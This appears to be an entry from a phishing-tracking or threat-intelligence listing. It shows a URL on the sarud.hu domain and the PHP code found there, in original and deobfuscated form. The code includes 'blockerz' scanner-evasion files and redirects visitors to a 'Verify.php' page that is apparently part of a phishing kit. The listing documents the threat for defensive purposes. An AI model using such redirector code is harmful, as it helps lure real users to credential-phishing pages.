Back to listTags
URLshttps://sarud.hu/sites/all/webapp/update
https://sarud.hu/sites/all/webapp/update
Deobfuscated code
<?php
include "blockerz2.php";
include "blockerz.php";
/**
* Place in a blank PHP page
*/
// Change to the URL you want to redirect to
$URL = "https://sarud.hu/sites/all/webapp/update id/app/anti/Verify.php";
header("Location: https://sarud.hu/sites/all/webapp/update id/app/anti/Verify.php");
?>
Original code
<?php
include "blockerz2.php";
include "blockerz.php";
/**
* Place in a blank PHP page
*/
// Change to the URL you want to redirect to
$URL="https://sarud.hu/sites/all/webapp/update id/app/anti/Verify.php";
header ("Location: $URL");
?>